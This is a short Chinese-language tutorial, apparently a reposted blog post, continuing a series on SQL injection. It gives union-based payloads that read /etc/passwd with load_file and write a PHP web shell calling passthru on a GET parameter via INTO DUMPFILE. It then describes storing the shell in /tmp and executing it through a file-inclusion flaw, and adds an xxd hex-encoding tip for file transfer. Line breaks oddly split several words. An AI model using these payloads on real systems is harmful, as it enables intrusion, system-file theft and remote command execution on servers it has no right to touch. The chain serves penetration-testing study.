上篇主要概述了
查询一些常见表格的
方法 这里在
增加一些
查询的方式
读取
文件:
'union select null,load_file('/etc/passwd')--
写入
文件
结合上面,我们可以写入
一个文件在目标路径
' union select null,"<?
PHP pa
ssthru($_GET['cmd']); ?>" INTO DUMPFILE "a.
PHP" --
这里的 <?
PHP pa
ssthru($_GET['cmd']); ?>为我们要执行的命令,
INTODUMPPFILE为我们创建的
一个文件a.
PHP
但是这里我们写入的地址明显是 网页
默认存放的路径,这个路径是无法执行,我们
要做的就是讲
文件放置可以执行的路径下,接着执行此
PHP文件。
结合我们之前提过的
文件包含漏洞,可以对其
PHP文件进行存储加执行
在存储的路径选择上,tmp路径是不错的选择,此
文件路径属于多个账号可以执行的路径
接着我们利用之前利用过的
文件包含漏洞进行
文件的执行
思路总结:利用系统的中间路径,将
文件写入,然后利用其它漏洞将
文件进行执行,这里结合了
文件包含以及
文件写入漏洞,漏洞利用成功
补充:如果我们需要将传输的
文件以二进制的方式进行传输需要在kali中用
cat 目标
文件 | xxd -ps | tr -d '\n'
xxd -ps转换为二进制,后面tr是将换行符去掉,将所有
代码汇总为一行
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。